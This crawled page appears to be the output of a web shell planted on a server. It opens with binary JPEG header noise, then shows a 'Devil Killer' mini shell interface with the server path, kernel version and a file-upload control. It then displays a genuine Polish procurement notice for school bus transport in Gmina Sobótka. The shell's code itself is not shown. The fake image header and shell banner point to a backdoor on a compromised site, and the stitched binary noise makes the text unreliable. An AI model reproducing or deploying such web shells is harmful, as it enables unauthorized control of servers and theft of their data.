JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210816/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210816/0015022901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów do szkół i przedszkoli w gminie Sobótka w roku szkolnym 2021/2022 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Sobótka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931935112</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sobótka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-050</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@sobotka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.sobotka.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów do szkół i przedszkoli w gminie Sobótka w roku szkolnym 2021/2022 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8674a587-fe8c-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00150229</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004396/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Dowóz uczniów do szkół i przedszkoli w gminie Sobótka w roku szkolnym 2021/2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://sobotka.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://sobotka.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu w tym składanie ofert, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków<br/>określonych w ustawie p.z.p., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki<br/>komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia<br/>18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (t.j. Dz. U. z 2020 r. poz. 344).<br/>Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe,<br/>pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci<br/>elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf,<br/>.doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale XI ust. 1 SWZ składa się, pod<br/>rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.<br/>W przedmiotowym postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu platformy zakupowej https://sobotka.ezamawiajacy.pl (w<br/>zakładce Korespondencja)<br/>Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r.<br/>w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy.<br/>Ofertę składa się, pod rygorem nieważności, w formie elektronicznej, za pośrednictwem Platformy<br/>dostępnej pod adresem https://sobotka.ezamawiajacy.pl, opatrzonej kwalifikowanym podpisem<br/>elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu,<br/>Zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na<br/>format PDF i opatrzenie ich podpisem kwalifikowanym PAdES.<br/>Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca<br/>powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym.<br/>Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem<br/>zakładki „Korespondencja”, nie za pośrednictwem adresu email. Za datę przekazania (wpływu)<br/>oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem sobotka.ezamawiajacy.pl.<br/>Zamawiający, zgodnie z rozporządzeniem określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na sobotka.ezamawiajacy.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informujemy, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Burmistrz Miasta i Gminy Sobótka, ul. Rynek 1,<br/>55-050 Sobótka, tel. 71 31 62 043, adres e-mail: urzad@sobotka.pl<br/>2. Z Inspektorem Ochrony Danych Osobowych można się kontaktować w sprawach ochrony Pani/Pana<br/>danych i realizacji praw z tym związanych, poprzez adres e-mail: iod@sobotka.pl lub pisemnie na<br/>adres siedziby administratora.<br/>3. Celem przetwarzania Pani/Pana danych osobowych jest realizacja ustawowych obowiązków<br/>Administratora oraz podjęcie działań przed zawarciem umowy na podstawie art. 6 ust. 1 lit. b i c<br/>RODO. Dane osobowe przetwarzane będą w związku z postępowaniem o udzielenie zamówienia<br/>publicznego oraz zawarciem umowy na podstawie ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych oraz ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych.<br/>4. Odbiorcami Pani/Pana danych osobowych mogą być osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o ustawę z dnia 26 września 2001 r. o dostępie do<br/>informacji publicznej oraz inne podmioty upoważnione na podstawie przepisów prawa lub umowy<br/>powierzenia przetwarzania danych.<br/>5. Pani/Pana dane osobowe będą przetwarzane do czasu osiągnięcia celu, w jakim je pozyskano, a po<br/>tym czasie przez okres oraz w zakresie wymaganym przez przepisy powszechnie obowiązującego<br/>prawa.<br/>6. W związku z przetwarzaniem Pani/Pana danych osobowych, z wyjątkami zastrzeżonymi przepisami<br/>prawa, przysługuje Pani/Panu prawo dostępu do danych oraz otrzymania ich kopii, prawo do<br/>sprostowania danych, prawo do ograniczenia przetwarzania danych oraz prawo do wniesienia skargi<br/>do organu nadzorczego (Prezesa Urzędu Ochrony Danych) w przypadku, gdy uważa Pani/Pan, że<br/>przetwarzamy Pani/Pana dane niezgodnie z prawem.<br/>7. Podanie przez Panią/Pana danych osobowych jest obowiązkowe. W przypadku niepodania danych<br/>nie będzie możliwe zawarcie umowy o udzielenie zamówienia.<br/>8. Przetwarzanie Pani/Pana danych osobowych nie będzie podlegało zautomatyzowanemu<br/>podejmowaniu decyzji, w tym profilowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIiGK.271.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Dowóz uczniów do szkół i przedszkoli w gminie Sobótka w roku szkolnym 2021/2022” od 01.10.2021 r. do 24.06.2022 r. w dniach realizacji obowiązku szkolnego w systemie stacjonarnym, poprzez zakup biletów miesięcznych dla uczniów szkół i przedszkoli prowadzonych przez Gminę Sobótka. Bilety obejmować będą różne trasy dowozu dla łącznej liczby 284 uczniów. Liczba ta w trakcie roku szkolnego może ulegać zmianie.<br/>2. Ze względu na różne kierunki dojazdu uczniów do szkół oraz różne odległości występujące pomiędzy poszczególnymi miejscowościami przedstawionymi w ofercie, Wykonawca zobowiązany jest do podania jednej uśrednionej ceny biletu miesięcznego dwustronnego (dowóz i odwóz). <br/>3. Przedmiotem zamówienia jest dowożenie uczniów do następujących placówek:<br/>- Zespołu Szkolno-Przedszkolnego im. Janusza Korczaka w Sobótce, ul. Świdnicka 20, 20a na (łączna liczba dzieci dowożonych – 126) z miejscowości Strzegomiany, Będkowice, Sulistrowice, Sulistrowiczki, Rogów, Wojnarowice, Okulice, Siedlakowice, Mirosławice, Żerzuszyce.<br/>- Szkoły Podstawowej nr 2 im. Marii Skłodowskiej-Curie w Sobótce, ul. Marii Skłodowskiej-Curie 19 (łączna liczba dzieci dowożonych – 17) z miejscowości Garncarsko.<br/>- Przedszkola nr 1 w Sobótce, ul. Świdnicka 49 (łączna liczba dzieci dowożonych – 5) z miejscowości Garncarsko.<br/>- Zespołu Szkolno-Przedszkolnego im. Marii Konopnickiej w Rogowie Sobóckim, ul. Szkolna 7 (łączna liczba dzieci dowożonych – 52) z miejscowości Michałowice, Żerzuszyce, Mirosławice, Mirosławiczki, Siedlakowice, Wojnarowice, Okulice.<br/>- Zespołu Szkolno-Przedszkolnego w Świątnikach, ul. Parkowa 6 (łączna liczba dzieci dowożonych – 84) z miejscowości Przezdrowice, Księginice Małe, Przemiłów, Kunów, Strachów, Nasławice, Stary Zamek, Olbrachtowice, Strzegomiany, Będkowice, Sulistrowiczki, Sulistrowice.<br/>4. Kursy dowozów uczniów do różnych placówek mogą być ze sobą połączone ze względu na to samo miejsce zamieszkania, ale uczniowie muszą mieć zagwarantowane podczas przewozu miejsce siedzące.<br/>5. Kursami dowożącymi uczniów do placówek, w miarę wolnych miejsc siedzących, będą mogli dodatkowo poruszać się pasażerowie, którzy zakupią bilety jednoprzejazdowe lub indywidualne bilety miesięczne. <br/>6. Uczniowie muszą być dowiezieni na zajęcia szkolne na godzinę 8:00, z wyjątkiem Zespołu Szkolno-Przedszkolnego w Świątnikach, gdzie zajęcia rozpoczynają się o godz. 7:45, co najmniej 10 minut przed rozpoczęciem zajęć.<br/>7. Odwóz uczniów ze szkoły/przedszkola do domu przewidywany jest w 2 turach:<br/>- ok. godz. 13:00 - 13:30,<br/>- ok. godz. 14:40 – 15:10.<br/>8. Zajęcia lekcyjne w szkołach podstawowych i przedszkolach Gminy Sobótka odbywać się będą pięć razy w tygodniu najpóźniej do godz. 14:30. Szczegółowy plan zajęć niezbędny do stworzenia harmonogramu dowozu dzieci do placówek przekażą Dyrektorzy szkół i przedszkoli temu Wykonawcy, którego oferta zostanie wybrana, na tydzień przed rozpoczęciem realizacji zadania.<br/>9. Liczby uczniów są wielkościami prognozowanymi i mogą się zmieniać w trakcie realizacji zamówienia. Zamawiający zastrzega sobie prawo zmiany tras i godzin w przypadku wystąpienia okoliczności nieprzewidzianych w organizacji roku szkolnego. Wykonawca powinien dostosować się do zaistniałej sytuacji, o której zostanie zawiadomiony przez Zamawiającego. <br/>10. Wykonawca jest zobowiązany do zapewnienia bezpieczeństwa uczniom w czasie dowozu do szkół i przedszkoli oraz w drodze powrotnej do domu.<br/>11. Wykonawca podczas świadczenia każdego przewozu zobowiązany jest zapewnić uczniom opiekuna. Funkcję opiekuna może sprawować wyłącznie osoba pełnoletnia. Osoba pełniąca funkcję opiekuna będzie zobowiązana w szczególności do: zapewnienia bezpieczeństwa w trakcie przewozu do szkół i przedszkoli, zapewnienia bezpiecznego wsiadania do pojazdu oraz wysiadania dzieci z pojazdu oraz zwracania uwagi na właściwe zachowanie się dzieci w czasie przejazdu. <br/>12. Wykonawca dysponuje odpowiednim potencjałem technicznym (co najmniej 4 autobusy) oraz osobami zdolnymi do wykonywania zamówienia – kierowcy posiadający uprawnienia do przewozu osób oraz pełnoletni opiekunowie.<br/>13. W przypadku awarii autobusu Wykonawca podstawi niezwłocznie autobus spełniający właściwe wymagania techniczne w ruchu drogowym. W przypadku niemożności zrealizowania przewozu Wykonawca pokryje dodatkowo koszty przewozu wynikłe z wykonania usługi przez podmiot zastępczy wybrany przez Zamawiającego. <br/><br/> Wykaz placówek oświatowych oraz prognozowana liczba uczniów dowożonych <br/><br/>1. Wykaz publicznych placówek oświatowych w gminie Sobótka:<br/>1. Szkoła Podstawowa nr 1 w Sobótce ul. Świdnicka 20, 20a<br/>2. Szkoła Podstawowa nr 2 w Sobótce ul. M. Skłodowskiej – Curie 19<br/>3. Szkoła Podstawowa w Rogowie Sobóckim ul. Szkolna 7<br/>4. Szkoła Podstawowa w Świątnikach ul. Parkowa 6<br/>5. Przedszkole nr 1 w Sobótce ul. Świdnicka 49 i Słoneczna 34<br/>2. Prognozowana liczba uczniów dowożonych do placówek od 01.10.2021 - 24.06.2022 r.:<br/>L.p.	Dowóz z miejscowości	Prognozowana liczba uczniów<br/><br/>Zespół Szkolno-Przedszkolny im. J.Korczaka w Sobótce ul. Świdnicka 20, 20a<br/><br/>1	Strzegomiany	44<br/>2	Będkowice	14<br/>3	Sulistrowice	27<br/>4	Sulistrowiczki	8<br/>5	Rogów Sobócki	13<br/>6	Wojnarowice	3<br/>7	Okulice	8<br/>8	Siedlakowice	3<br/>9	Mirosławice	5<br/>10	Żerzuszyce	1<br/> RAZEM	126 <br/><br/>Szkoła Podstawowa nr 2 w Sobótce ul. M. Skłodowskiej – Curie 19 <br/>i Przedszkole nr 1 w Sobótce ul. Świdnicka 49<br/><br/>1	Garncarsko	17 + 5 <br/>(sp+przedszkole)<br/> RAZEM 22<br/><br/>Zespół Szkolno-Przedszkolny im. M.Konopnickiej w Rogowie Sobóckim ul. Szkolna 7<br/><br/>1	Michałowice	7<br/>2	Żerzuszyce	3<br/>3	Mirosławice	9<br/>4	Mirosławiczki	3<br/>5	Siedlakowice	5<br/>6	Wojnarowice	15<br/>7	Okulice	10<br/> RAZEM	52<br/><br/>Zespół Szkolno-Przedszkolny w Świątnikach ul. Parkowa 6<br/><br/>1	Przezdrowice	7<br/>2	Księginice Małe	22<br/>3	Przemiłów	5<br/>4	Kunów 8<br/>5	Strachów	3<br/>6	Nasławice	14<br/>7	Stary Zamek	4<br/>8	Olbrachtowice	3<br/>9	Strzegomiany	1<br/>10	Będkowice	4<br/>11	Sulistrowiczki	3<br/>12	Sulistrowice	10<br/> RAZEM	84<br/><br/> <br/> Łączna liczba uczniów	<br/>284<br/><br/>Wykaz przystanków autobusowych, z których i do których dowożeni są uczniowie<br/>do szkół i placówek Gminy Sobótka w roku szkolnym 2021/2022<br/>L.p.	Nazwa miejscowości	Lokalizacja przystanku	Opis istniejącej infrastruktury	Uwagi<br/>1. Będkowice	Przystanek PKS Wiata	Obok skrzyżowania<br/>2. Garncarsko	Przystanek PKS Wiata	ul. Nowowiejska<br/><br/>3. Księginice Małe	Przystanek PKS	Wiata<br/>	Naprzeciw kościoła<br/>4. Kryształowice	Przystanek ul. Leśna Wiata	ul.. Leśna miedzy budynkami nr 7 a nr 9 <br/>5. Kunów	Przystanek PKS	Wiata	ul. Nasławicka obok bud.<br/>nr 14 <br/>6. Michałowice	Przystanek PKS	Wiata ul. Mirosławicka obok bud. nr 9<br/>7. Mirosławice 1<br/><br/>Mirosławice 2<br/><br/>Mirosławiczki	Przystanek PKS <br/><br/>Przystanek przy bud. nr 11<br/><br/>Przystanek przy bud. nr 2	Wiata <br/><br/>Brak wiaty<br/><br/>Brak wiaty<br/>	ul. Wrocławska – zatoka aut.<br/><br/>ul. Przysiółkowa<br/><br/>ul. Kryształowicka<br/>8. Nasławice	Przystanek PKS	Wiata	ul. 1-go Maja, skrzyżowanie z ul. Komuny Paryskiej<br/>9. Okulice	Przystanek PKS	Wiata <br/>	Plac manewrowy<br/>10. Olbrachtowice	Przystanek PKS<br/>	Brak wiaty	ul. Wronia <br/>11. Przemiłów	Przystanek PKS	Brak wiaty<br/>	ul. Partyzantów przy bud. 8a<br/>12. Przezdrowice	Przystanek na wysokości bud. nr 12	Brak wiaty	ul. Chopina<br/>13. Ręków	Przystanek<br/> ul Nasławicka 21 <br/><br/>ul. Nasławicka 27	Brak wiaty	Przy Niepublicznej Szkole Podstawowej w Rękowie<br/><br/>oraz bliżej skrzyżowania <br/>14. Rogów Sobócki 1<br/><br/><br/>Rogów Sobócki 2<br/><br/>Rogów Sobócki 3<br/><br/>Rogów Sobócki 4	Przystanek przy Karczmie Stara Mleczarnia<br/><br/>Przystanek PKS <br/><br/>Przystanek PKS<br/><br/>Przystanek	Wiata <br/><br/><br/>Wiata<br/><br/>Wiata<br/><br/>Wiata	ul. Wrocławska<br/><br/><br/>Naprzeciw stacji paliw –zatoka aut.<br/>Na wysokości bud. nr 70 – zatoka autob.<br/>ul. Wrcoławska przy zbiegu<br/>z ul. Młynarską – zatoka autob.<br/>15. Siedlakowice 1<br/><br/>Siedlakowice 2	Przystanek PKS<br/><br/>Przystanek	Wiata<br/><br/>Brak wiaty	ul.Wrocławska –zatoka aut.<br/><br/>ul. Gwarna<br/>16. Sobótka –centrum<br/><br/>	Przystanek przy kompleksie szkół	Brak wiaty	ul. Świdnicka 20 SP Nr 1<br/>ul. Świdnicka 20a <br/>17. Sobótka Zachodnia 1<br/><br/>Sobótka Zachodnia 2	Przystanek PKS<br/><br/>Przystanek przy SP Nr 2, bud. nr 19	Brak wiaty<br/><br/>Brak wiaty	ul. Zmorskiego<br/><br/>ul. M.Sklodowskiej-Curie<br/>18. Sobótka Górka 1<br/><br/> <br/>Sobótka Górka 2	Przystanek PKS przy Przedszkolu nr 1, bud nr 49<br/>Przystanek PKS	Wiata<br/><br/><br/>Wiata ul. Świdnicka - zatoka autob<br/><br/><br/>ul. Świdnicka skrzyżowanie z ul. Słowiańską - zatoka aut.<br/>19. Stary Zamek	Przystanek PKS	Wiata <br/>	k/świetlicy wiejskiej<br/>20. Strachów	Przystanek PKS	Wiata <br/>	ul. Zwarta centrum wsi<br/>21. Strzegomiany Przystanek za lustrem	Brak wiaty	ul. Wrocławska - zatoka po prawej stronie jądąc w kier. Będkowic<br/>22. Sulistrowice-centrum	Przystanek PKS Wiata<br/>	ul. Jagiellońska<br/>23. Sulistrowiczki 1<br/><br/><br/>Sulistrowiczki 2<br/><br/><br/>Sulistrowiczki 3<br/><br/><br/>Sulistrowiczki 4	Przystanek <br/><br/><br/>Przystanek<br/><br/><br/>Przystanek PKS <br/><br/><br/>Przystanek	Brak wiaty<br/><br/><br/>Brak wiaty<br/><br/><br/>Wiata<br/><br/><br/>Brak wiaty	ul. Świdnicka na wysokości działki 30/3 AM-1<br/><br/>u zbiegu ulic Świdnickiej i Promiennej<br/><br/>tzw. ryneczek ul. Parkowa oraz ewent. przy „Caritas”<br/><br/>autobus zawraca na parkingu przy kaplicy MBDR<br/>24. Świątniki 1<br/><br/>Świątniki 2	Przystanek PKS<br/><br/>Przystanek koło szkoły Wiata <br/><br/>Brak wiaty	ul. Kopernika<br/><br/>ul. Szkolna 